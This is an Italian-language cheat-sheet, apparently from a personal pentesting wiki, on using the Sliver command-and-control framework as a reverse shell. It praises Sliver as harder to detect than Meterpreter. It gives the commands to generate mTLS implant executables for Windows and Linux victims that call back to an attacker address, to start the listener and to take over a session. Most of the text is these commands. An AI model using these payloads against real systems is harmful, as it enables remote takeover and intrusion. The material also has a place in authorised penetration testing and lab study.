tags: reverse_shell Sliver Sliver_Reverse_Shell


Questa shell è superiore a meterpreter sotto diversi aspetti, innanzitutto è più semplice da configurare ed utilizzare ed in secondo luogo è molto più difficile da rilevare perchè è tutto crittografato, per prima cosa dobbiamo avviare il listener che ci permetterà di ottenere una reverse shell e lo possiamo fare con il seguente comando:

 
sliver-server
 
#oppure solo:
 
sliver
 

Payload Standard

Ora che abbiamo attivato il listener possiamo creare il payload da eseguire sulla macchina vittima, questo è il payload standard che viene rilevato facilmente dai sistemi di difesa:

Windows

generate --mtls 10.0.2.15:8888 --os windows --arch amd64 --format exe --save payload.exe

Linux

generate --mtls 10.0.2.15:8888 --os linux --arch amd64 --format elf -s impianto_linux

Listeners

Prima di avviare il payload sulla macchina vittima dobbiamo metterci in ascolto con sliver e se per esempio abbiamo utilzzato un payload con mtls ci basterà digitare i seguenti comandi per avviare la sessione:

 
mtls
sessions
use 12345abc
 
#Nel caso si avesse difficoltà con porte o indirizzi IP possiamo sempre usare le seguenti flag:
 
sliver > mtls --help
 
Start an mTLS listener
 
Usage:
======
  mtls [flags]
 
Flags:
======
  -h, --help                 display help
  -L, --lhost      string    interface to bind server to
  -l, --lport      int       tcp listen port (default: 8888)
  -p, --persistent           make persistent across restarts
  -t, --timeout    int       command timeout in seconds (default: 60)
 
sliver > mtls --lport 4455